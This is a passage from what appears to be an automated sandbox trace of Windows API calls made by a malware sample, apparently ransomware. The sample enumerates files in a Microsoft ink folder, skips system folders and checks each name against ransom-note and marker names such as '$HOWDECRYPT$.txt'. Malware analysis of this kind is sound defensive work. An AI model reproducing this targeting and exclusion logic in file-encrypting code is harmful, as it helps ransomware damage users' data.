lpString2=".") returned 1 [0086.346] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.346] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.346] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="Windows") returned -1 [0086.346] lstrlenW (lpString="Windows") returned 7 [0086.346] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="$Recycle.bin") returned 1 [0086.346] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.346] lstrcmpiW (lpString1="boxed-correct.avi", lpString2="System Volume Information") returned -1 [0086.346] lstrlenW (lpString="System Volume Information") returned 25 [0086.346] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 78 [0086.346] StrStrIW (lpFirst="boxed-correct.avi", lpSrch=".spyhunter") returned 0x0 [0086.346] lstrcmpW (lpString1="boxed-correct.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.346] lstrcmpW (lpString1="boxed-correct.avi", lpString2="_uninstalling_.png") returned 1 [0086.346] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 78 [0086.346] GetProcessHeap () returned 0x2c0000 [0086.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x371bc0 [0086.346] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x373808, Size=0x780) returned 0x370998 [0086.346] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.346] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="Windows") returned -1 [0086.346] lstrlenW (lpString="Windows") returned 7 [0086.346] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="$Recycle.bin") returned 1 [0086.346] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.346] lstrcmpiW (lpString1="boxed-delete.avi", lpString2="System Volume Information") returned -1 [0086.347] lstrlenW (lpString="System Volume Information") returned 25 [0086.347] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 77 [0086.347] StrStrIW (lpFirst="boxed-delete.avi", lpSrch=".spyhunter") returned 0x0 [0086.347] lstrcmpW (lpString1="boxed-delete.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.347] lstrcmpW (lpString1="boxed-delete.avi", lpString2="_uninstalling_.png") returned 1 [0086.347] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 77 [0086.347] GetProcessHeap () returned 0x2c0000 [0086.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x371ca8 [0086.347] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x370998, Size=0x788) returned 0x370998 [0086.347] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.347] lstrcmpiW (lpString1="boxed-join.avi", lpString2="Windows") returned -1 [0086.347] lstrlenW (lpString="Windows") returned 7 [0086.347] lstrcmpiW (lpString1="boxed-join.avi", lpString2="$Recycle.bin") returned 1 [0086.347] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.347] lstrcmpiW (lpString1="boxed-join.avi", lpString2="System Volume Information") returned -1 [0086.347] lstrlenW (lpString="System Volume Information") returned 25 [0086.347] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 75 [0086.347] StrStrIW (lpFirst="boxed-join.avi", lpSrch=".spyhunter") returned 0x0 [0086.347] lstrcmpW (lpString1="boxed-join.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.347] lstrcmpW (lpString1="boxed-join.avi", lpString2="_uninstalling_.png") returned 1 [0086.347] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 75 [0086.347] GetProcessHeap () returned 0x2c0000 [0086.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x32fe90 [0086.347] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x370998, Size=0x790) returned 0x370998 [0086.348] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.348] lstrcmpiW (lpString1="boxed-split.avi", lpString2="Windows") returned -1 [0086.348] lstrlenW (lpString="Windows") returned 7 [0086.348] lstrcmpiW (lpString1="boxed-split.avi", lpString2="$Recycle.bin") returned 1 [0086.348] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.348] lstrcmpiW (lpString1="boxed-split.avi", lpString2="System Volume Information") returned -1 [0086.348] lstrlenW (lpString="System Volume Information") returned 25 [0086.348] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 76 [0086.348] StrStrIW (lpFirst="boxed-split.avi", lpSrch=".spyhunter") returned 0x0 [0086.348] lstrcmpW (lpString1="boxed-split.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.348] lstrcmpW (lpString1="boxed-split.avi", lpString2="_uninstalling_.png") returned 1 [0086.348] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 76 [0086.348] GetProcessHeap () returned 0x2c0000 [0086.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x371d90 [0086.348] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x370998, Size=0x798) returned 0x370998 [0086.348] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.348] lstrcmpiW (lpString1="correct.avi", lpString2="Windows") returned -1 [0086.348] lstrlenW (lpString="Windows") returned 7 [0086.348] lstrcmpiW (lpString1="correct.avi", lpString2="$Recycle.bin") returned 1 [0086.348] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.348] lstrcmpiW (lpString1="correct.avi", lpString2="System Volume Information") returned -1 [0086.348] lstrlenW (lpString="System Volume Information") returned 25 [0086.348] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 72 [0086.348] StrStrIW (lpFirst="correct.avi", lpSrch=".spyhunter") returned 0x0 [0086.348] lstrcmpW (lpString1="correct.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.348] lstrcmpW (lpString1="correct.avi", lpString2="_uninstalling_.png") returned 1 [0086.348] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 72 [0086.348] GetProcessHeap () returned 0x2c0000 [0086.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x32ff70 [0086.348] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x370998, Size=0x7a0) returned 0x370998 [0086.349] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.349] lstrcmpiW (lpString1="delete.avi", lpString2="Windows") returned -1 [0086.349] lstrlenW (lpString="Windows") returned 7 [0086.349] lstrcmpiW (lpString1="delete.avi", lpString2="$Recycle.bin") returned 1 [0086.349] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.349] lstrcmpiW (lpString1="delete.avi", lpString2="System Volume Information") returned -1 [0086.349] lstrlenW (lpString="System Volume Information") returned 25 [0086.349] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 71 [0086.349] StrStrIW (lpFirst="delete.avi", lpSrch=".spyhunter") returned 0x0 [0086.349] lstrcmpW (lpString1="delete.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.349] lstrcmpW (lpString1="delete.avi", lpString2="_uninstalling_.png") returned 1 [0086.349] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 71 [0086.349] GetProcessHeap () returned 0x2c0000 [0086.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33f6c0 [0086.349] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x370998, Size=0x7a8) returned 0x370998 [0086.349] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.349] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="Windows") returned -1 [0086.349] lstrlenW (lpString="Windows") returned 7 [0086.349] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="$Recycle.bin") returned 1 [0086.349] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.349] lstrcmpiW (lpString1="FlickLearningWizard.exe.mui", lpString2="System Volume Information") returned -1 [0086.349] lstrlenW (lpString="System Volume Information") returned 25 [0086.349] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 88 [0086.349] StrStrIW (lpFirst="FlickLearningWizard.exe.mui", lpSrch=".spyhunter") returned 0x0 [0086.349] lstrcmpW (lpString1="FlickLearningWizard.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.349] lstrcmpW (lpString1="FlickLearningWizard.exe.mui", lpString2="_uninstalling_.png") returned 1 [0086.349] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 88 [0086.349] GetProcessHeap () returned 0x2c0000 [0086.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x330050 [0086.349] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x370998, Size=0x7b0) returned 0x370998 [0086.350] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.350] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="Windows") returned -1 [0086.350] lstrlenW (lpString="Windows") returned 7 [0086.350] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.350] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.350] lstrcmpiW (lpString1="InkObj.dll.mui", lpString2="System Volume Information") returned -1 [0086.350] lstrlenW (lpString="System Volume Information") returned 25 [0086.350] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 75 [0086.350] StrStrIW (lpFirst="InkObj.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.350] lstrcmpW (lpString1="InkObj.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.350] lstrcmpW (lpString1="InkObj.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkObj.dll.mui") returned 75 [0086.350] GetProcessHeap () returned 0x2c0000 [0086.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x371150 [0086.350] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x370998, Size=0x7b8) returned 0x383fd0 [0086.350] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.350] lstrcmpiW (lpString1="InkWatson.exe.mui", lpString2="Windows") returned -1 [0086.350] lstrlenW (lpString="Windows") returned 7 [0086.350] lstrcmpiW (lpString1="InkWatson.exe.mui", lpString2="$Recycle.bin") returned 1 [0086.350] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.350] lstrcmpiW (lpString1="InkWatson.exe.mui", lpString2="System Volume Information") returned -1 [0086.350] lstrlenW (lpString="System Volume Information") returned 25 [0086.350] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 78 [0086.350] StrStrIW (lpFirst="InkWatson.exe.mui", lpSrch=".spyhunter") returned 0x0 [0086.350] lstrcmpW (lpString1="InkWatson.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.350] lstrcmpW (lpString1="InkWatson.exe.mui", lpString2="_uninstalling_.png") returned 1 [0086.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InkWatson.exe.mui") returned 78 [0086.351] GetProcessHeap () returned 0x2c0000 [0086.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x371e78 [0086.351] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x7c0) returned 0x383fd0 [0086.351] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.351] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="Windows") returned -1 [0086.351] lstrlenW (lpString="Windows") returned 7 [0086.351] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="$Recycle.bin") returned 1 [0086.351] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.351] lstrcmpiW (lpString1="InputPersonalization.exe.mui", lpString2="System Volume Information") returned -1 [0086.351] lstrlenW (lpString="System Volume Information") returned 25 [0086.351] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 89 [0086.351] StrStrIW (lpFirst="InputPersonalization.exe.mui", lpSrch=".spyhunter") returned 0x0 [0086.351] lstrcmpW (lpString1="InputPersonalization.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.351] lstrcmpW (lpString1="InputPersonalization.exe.mui", lpString2="_uninstalling_.png") returned 1 [0086.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 89 [0086.351] GetProcessHeap () returned 0x2c0000 [0086.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x371230 [0086.351] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x7c8) returned 0x383fd0 [0086.351] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.351] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="Windows") returned -1 [0086.351] lstrlenW (lpString="Windows") returned 7 [0086.351] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.351] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.351] lstrcmpiW (lpString1="IPSEventLogMsg.dll.mui", lpString2="System Volume Information") returned -1 [0086.351] lstrlenW (lpString="System Volume Information") returned 25 [0086.351] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 83 [0086.351] StrStrIW (lpFirst="IPSEventLogMsg.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.351] lstrcmpW (lpString1="IPSEventLogMsg.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.352] lstrcmpW (lpString1="IPSEventLogMsg.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.352] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 83 [0086.352] GetProcessHeap () returned 0x2c0000 [0086.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328918 [0086.352] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x7d0) returned 0x383fd0 [0086.352] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.352] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="Windows") returned -1 [0086.352] lstrlenW (lpString="Windows") returned 7 [0086.352] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.352] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.352] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="System Volume Information") returned -1 [0086.352] lstrlenW (lpString="System Volume Information") returned 25 [0086.352] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 87 [0086.352] StrStrIW (lpFirst="IpsMigrationPlugin.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.352] lstrcmpW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.352] lstrcmpW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.352] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 87 [0086.352] GetProcessHeap () returned 0x2c0000 [0086.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x371330 [0086.352] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x7d8) returned 0x383fd0 [0086.352] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.352] lstrcmpiW (lpString1="join.avi", lpString2="Windows") returned -1 [0086.352] lstrlenW (lpString="Windows") returned 7 [0086.352] lstrcmpiW (lpString1="join.avi", lpString2="$Recycle.bin") returned 1 [0086.352] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.352] lstrcmpiW (lpString1="join.avi", lpString2="System Volume Information") returned -1 [0086.353] lstrlenW (lpString="System Volume Information") returned 25 [0086.353] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 69 [0086.353] StrStrIW (lpFirst="join.avi", lpSrch=".spyhunter") returned 0x0 [0086.353] lstrcmpW (lpString1="join.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.353] lstrcmpW (lpString1="join.avi", lpString2="_uninstalling_.png") returned 1 [0086.353] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 69 [0086.353] GetProcessHeap () returned 0x2c0000 [0086.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x33f798 [0086.353] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x7e0) returned 0x383fd0 [0086.353] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.353] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="Windows") returned -1 [0086.353] lstrlenW (lpString="Windows") returned 7 [0086.353] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.353] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.353] lstrcmpiW (lpString1="micaut.dll.mui", lpString2="System Volume Information") returned -1 [0086.353] lstrlenW (lpString="System Volume Information") returned 25 [0086.353] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 75 [0086.353] StrStrIW (lpFirst="micaut.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.353] lstrcmpW (lpString1="micaut.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.353] lstrcmpW (lpString1="micaut.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.353] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 75 [0086.353] GetProcessHeap () returned 0x2c0000 [0086.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x371428 [0086.353] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x7e8) returned 0x383fd0 [0086.353] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.353] lstrcmpiW (lpString1="mip.exe.mui", lpString2="Windows") returned -1 [0086.353] lstrlenW (lpString="Windows") returned 7 [0086.354] lstrcmpiW (lpString1="mip.exe.mui", lpString2="$Recycle.bin") returned 1 [0086.354] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.354] lstrcmpiW (lpString1="mip.exe.mui", lpString2="System Volume Information") returned -1 [0086.354] lstrlenW (lpString="System Volume Information") returned 25 [0086.354] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 72 [0086.354] StrStrIW (lpFirst="mip.exe.mui", lpSrch=".spyhunter") returned 0x0 [0086.354] lstrcmpW (lpString1="mip.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.354] lstrcmpW (lpString1="mip.exe.mui", lpString2="_uninstalling_.png") returned 1 [0086.354] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 72 [0086.354] GetProcessHeap () returned 0x2c0000 [0086.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x371508 [0086.354] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x7f0) returned 0x383fd0 [0086.354] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.354] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="Windows") returned -1 [0086.354] lstrlenW (lpString="Windows") returned 7 [0086.354] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.354] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.354] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="System Volume Information") returned -1 [0086.354] lstrlenW (lpString="System Volume Information") returned 25 [0086.354] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 78 [0086.354] StrStrIW (lpFirst="mshwLatin.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.354] lstrcmpW (lpString1="mshwLatin.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.354] lstrcmpW (lpString1="mshwLatin.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.354] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 78 [0086.354] GetProcessHeap () returned 0x2c0000 [0086.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x371f60 [0086.354] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x7f8) returned 0x383fd0 [0086.354] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.355] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="Windows") returned -1 [0086.355] lstrlenW (lpString="Windows") returned 7 [0086.355] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.355] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.355] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="System Volume Information") returned -1 [0086.355] lstrlenW (lpString="System Volume Information") returned 25 [0086.355] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 75 [0086.355] StrStrIW (lpFirst="rtscom.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.355] lstrcmpW (lpString1="rtscom.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.355] lstrcmpW (lpString1="rtscom.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.355] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 75 [0086.355] GetProcessHeap () returned 0x2c0000 [0086.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3715e8 [0086.355] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x800) returned 0x383fd0 [0086.355] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.355] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="Windows") returned -1 [0086.355] lstrlenW (lpString="Windows") returned 7 [0086.355] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="$Recycle.bin") returned 1 [0086.355] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.355] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="System Volume Information") returned -1 [0086.355] lstrlenW (lpString="System Volume Information") returned 25 [0086.355] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 83 [0086.355] StrStrIW (lpFirst="ShapeCollector.exe.mui", lpSrch=".spyhunter") returned 0x0 [0086.355] lstrcmpW (lpString1="ShapeCollector.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.355] lstrcmpW (lpString1="ShapeCollector.exe.mui", lpString2="_uninstalling_.png") returned 1 [0086.355] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 83 [0086.355] GetProcessHeap () returned 0x2c0000 [0086.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328a08 [0086.356] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x808) returned 0x383fd0 [0086.356] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.356] lstrcmpiW (lpString1="split.avi", lpString2="Windows") returned -1 [0086.356] lstrlenW (lpString="Windows") returned 7 [0086.356] lstrcmpiW (lpString1="split.avi", lpString2="$Recycle.bin") returned 1 [0086.356] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.356] lstrcmpiW (lpString1="split.avi", lpString2="System Volume Information") returned -1 [0086.356] lstrlenW (lpString="System Volume Information") returned 25 [0086.356] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 70 [0086.356] StrStrIW (lpFirst="split.avi", lpSrch=".spyhunter") returned 0x0 [0086.356] lstrcmpW (lpString1="split.avi", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.356] lstrcmpW (lpString1="split.avi", lpString2="_uninstalling_.png") returned 1 [0086.356] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 70 [0086.356] GetProcessHeap () returned 0x2c0000 [0086.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x33f870 [0086.356] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x383fd0, Size=0x810) returned 0x383fd0 [0086.356] FindNextFileW (in: 